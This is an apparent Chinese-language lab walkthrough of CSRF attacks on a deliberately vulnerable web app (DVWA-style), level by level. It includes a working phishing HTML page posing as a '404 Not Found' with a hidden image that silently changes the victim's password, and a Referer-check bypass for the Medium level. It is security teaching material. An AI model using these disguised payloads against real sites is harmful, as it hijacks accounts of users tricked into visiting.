CSRF：Cross-site request forgery（跨站请求伪造）

本章使用的浏览器是Firefox63，由于浏览器和版本不同，复现结果可能不同

1.Low

这是一个修改用户密码的界面，查看url可以发现，修改新密码直接通过url传参给服务器

192.168.171.10/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#

利用方法1：把密码改成自己需要的，然后把网址改成短网址，再欺骗用户点击，从而修改密码。

利用方法2：把下面网页放到钓鱼服务器上，然后诱导用户访问，访问之后密码就会被修改。

<!--CSRF.html-->

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <img src="http://192.168.171.10/vulnerabilities/csrf/?password_new=12345&password_conf=12345&Change=Change#" border="0" style="display: none;"/>
    <h1>404 Not Found.</h1>
    <h2>hello world!</h2>
</body>
</html>

打开这个html文件

再次登录发现密码已经成功修改。

2.Medium

本等级的

Linux靶机ip为192.168.171.10

另一台Server 2003服务器ip为192.168.171.8

模拟的win 7客户机ip为192.168.171.2
HTTP Referer是header的一部分，当浏览器向web服务器发送请求的时候，一般会带上Referer，告诉服务器该网页是从哪个页面链接过来的，服务器因此可以获得一些信息用于处理。

——百度百科

medium类型的代码在Low级别的基础上，加上了对用户请求头的中的Referer字段进行验证

源代码关键语句:

if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false )

抓包内容：

SERVER_NAME对应着Host，HTTP_REFERER对应着Referer。

必须Referer里面有Host的内容才能修改密码，故方法一方法无效。

但是方法二还可以用。

可以把HTML文件修改成靶机ip地址，或者吧文件放到以靶机ip地址命名的的目录里，然后与host对住，就可以修改密码了。

修改之后抓包查看：

登录查看密码已经成功修改了。

3.High

配合XSS利用

4.Impossible

需要输入原密码才能修改密码，CSRF无解